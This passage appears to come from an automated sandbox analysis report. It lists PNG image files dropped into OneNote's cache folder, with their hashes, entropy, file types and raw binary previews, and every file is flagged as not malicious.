Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000B.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000D.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000E.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000F.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000H.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000J.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
